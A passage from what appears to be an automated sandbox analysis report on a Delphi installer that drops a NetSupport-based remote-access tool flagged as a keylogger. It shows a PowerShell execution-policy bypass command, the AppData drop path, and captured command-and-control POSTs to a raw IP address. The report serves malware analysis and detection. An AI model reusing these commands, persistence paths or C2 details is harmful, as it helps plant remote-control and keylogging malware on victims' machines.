                                                                                                                                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  CF-Ray: 8df7795488750c13-DFW
                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                  cf-apo-via: origin,host
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6ycPoe%2F1N0ENKONYi9CJTqbFoMe2FudJja4eif6XS%2FkIUbRgCj4nIC99lzu5XSYDEkhiUnslG8GVe0l3ATQ5dyh3k8VBYm%2Bz%2FTUCg%2FNk2XE%2BvePKg3Lb0ksfNTozyUjsXzrnX%2FYccMZJ871"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                  Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  2192.168.2.449740199.188.200.1954434008C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.873699903 CET222OUTPOST http://199.188.200.195/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 199.188.200.195Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                                                                                                                  Data Raw:
                                                                                                                                                                                                  Data Ascii:


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  3192.168.2.449742104.26.0.231804008C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.643130064 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                                                                                                                                  Host: geo.netsupportsoftware.com
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                  Nov 8, 2024 19:02:27.624821901 CET1104INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 18:02:27 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  CF-Ray: 8df7795fce8b1440-DFW
                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                  cf-apo-via: origin,host
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pQjO%2B41IdUtx%2FJmGyD87oAf6VQPsI1Chxse26dpberDEWTV%2FWp0MpdaxbscXKb1WGKQpzdrNsKelEeTwlExkgdzda5JgF2CrvwH0AN%2F7eje7NBY2aeMPN5e%2Fhgew8yebCx%2FRiGxCS1wYq1N7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1054&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                  Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  4192.168.2.449743104.26.0.231804008C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Nov 8, 2024 19:02:27.630938053 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                                                                                                                                  Host: geo.netsupportsoftware.com
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                  Nov 8, 2024 19:02:28.578772068 CET1091INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 18:02:28 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  CF-Ray: 8df77965ffcc4751-DFW
                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                  cf-apo-via: origin,host
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U4knnFWNE1BF9p27ArHB4yz%2FHT3QSRWU4CBsaxuAejnAP2XeAYI%2BhoGOLcuuG7PI4Ie1IpAtLJrap97WMEhm15TBDCAll7SAFt4XMFb8f63oKwgkRK67MnnOtET1aGOwhuEDZWAE0ZOUthX6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1201&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                  Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                                                                                                                                                                                  Nov 8, 2024 19:02:28.578787088 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                  Start time:13:01:57
                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                  Path:C:\Users\user\Desktop\KC0uZWwr8p.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\KC0uZWwr8p.exe"
                                                                                                                                                                                                  Imagebase:0x630000
                                                                                                                                                                                                  File size:21'424'072 bytes
                                                                                                                                                                                                  MD5 hash:3C387C0DB035C0C3185D6FBD1AB46BD1
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                  Start time:13:01:57
                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp" /SL5="$20430,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe"
                                                                                                                                                                                                  Imagebase:0x4c0000
                                                                                                                                                                                                  File size:3'305'472 bytes
                                                                                                                                                                                                  MD5 hash:77264DBCB409DE0C426BD5088B0FBE09
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                  Start time:13:02:20
                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1"
                                                                                                                                                                                                  Imagebase:0x840000
                                                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                  Start time:13:02:20
                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                  Start time:13:02:23
                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:121'304 bytes
                                                                                                                                                                                                  MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000000.1905886353.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.4094673945.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                  Start time:13:02:36
                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:121'304 bytes
                                                                                                                                                                                                  MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2034197288.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000000.2033095471.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2034732030.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                  Start time:13:02:44
                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:121'304 bytes
                                                                                                                                                                                                  MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2115416028.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000000.2113912617.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2116677838.0000000000788000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                    Function 07FD3802 Relevance: 7.8, Strings: 6, Instructions: 345COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: Hbq$Hbq$Hbq$Hbq$TJcq$Te^q
                                                                                                                                                                                                    • API String ID: 0-3655936231
                                                                                                                                                                                                    • Opcode ID: 02a31bc83932d962a6345fb79eef4dcc634391550294a08302a08fb0fd8163dc
                                                                                                                                                                                                    • Instruction ID: 6d565fa39b2df52cf8b707ee4cd3471be2fb414fbf2a2f57bc2703702c49e0ec
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02a31bc83932d962a6345fb79eef4dcc634391550294a08302a08fb0fd8163dc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07C18871B006418FCB15DF7AD554A6EBBE3BF89300B18856DD50A8B3A1DF30EC468B92
                                                                                                                                                                                                    Function 072707F8 Relevance: 11.6, Strings: 9, Instructions: 319COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: ,etq$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                    • API String ID: 0-1206794132
                                                                                                                                                                                                    • Opcode ID: d35728b50db5c09efa92e5de34d79aad377e412b1098256c61f35c12e0554124
                                                                                                                                                                                                    • Instruction ID: b5724b13b7c94aa05b30f3cd7bc7e2e516f82963cad647e1f7c2208ce14c231b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d35728b50db5c09efa92e5de34d79aad377e412b1098256c61f35c12e0554124
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7B127B1B20206DFDB388F69C64466BBBE2FF85310F1484AAE549CF251DB31D949C7A1
                                                                                                                                                                                                    Function 07279020 Relevance: 5.6, Strings: 4, Instructions: 588COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                    • API String ID: 0-1420252700
                                                                                                                                                                                                    • Opcode ID: d1da6c4b949809df580aaa66bae6cadcb3e2bdb8527bfb0cf3365a2ac766f82c
                                                                                                                                                                                                    • Instruction ID: df59995ee221e155177594e3b5dff28984f8789428dcea8e207e7bd060ea5449
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1da6c4b949809df580aaa66bae6cadcb3e2bdb8527bfb0cf3365a2ac766f82c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66129DB17243568FC7159B289911BBABBA6AFC2310F1480BBD585CF291DF31E8C5C7A1
                                                                                                                                                                                                    Function 07276758 Relevance: 4.6, Strings: 3, Instructions: 894COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: $^q$$^q$$^q
                                                                                                                                                                                                    • API String ID: 0-831282457
                                                                                                                                                                                                    • Opcode ID: 9b0a53507930df509d10fe1b1e426e075f667f1a3a0d95b0d412405b47c36011
                                                                                                                                                                                                    • Instruction ID: 37ea3059c2c8c618aaf32ee8ba1b8367adb5c9cf6de524b8e21dc907a6581776
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b0a53507930df509d10fe1b1e426e075f667f1a3a0d95b0d412405b47c36011
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B85258B1720246CFCB259B78CA40AAABBE2EF85310F1484AAE505DF351DF36DD45C7A1
                                                                                                                                                                                                    Function 07FD94E8 Relevance: 3.2, Strings: 2, Instructions: 669COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1949696045.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7fd0000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: (Xcq$LR^q
                                                                                                                                                                                                    • API String ID: 0-2856513941
                                                                                                                                                                                                    • Opcode ID: 8af6cf0e7e425737c1d94a1a9e209d81d072e18521d547f30019e6756f2a1fa3
                                                                                                                                                                                                    • Instruction ID: 2c1be9b1d7471aeb9defd9c71f9a237dc4b6c92dc3b827022f8776b5748d70c1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8af6cf0e7e425737c1d94a1a9e209d81d072e18521d547f30019e6756f2a1fa3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D525670B00218CFDB25DB64C855BAEB7B3EF85300F1980A9D8499B395DB74AD85CF52
                                                                                                                                                                                                    Function 07274D10 Relevance: 2.7, Strings: 2, Instructions: 214COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.1946878925.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7270000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: 4'^q$4'^q
                                                                                                                                                                                                    • API String ID: 0-2697143702
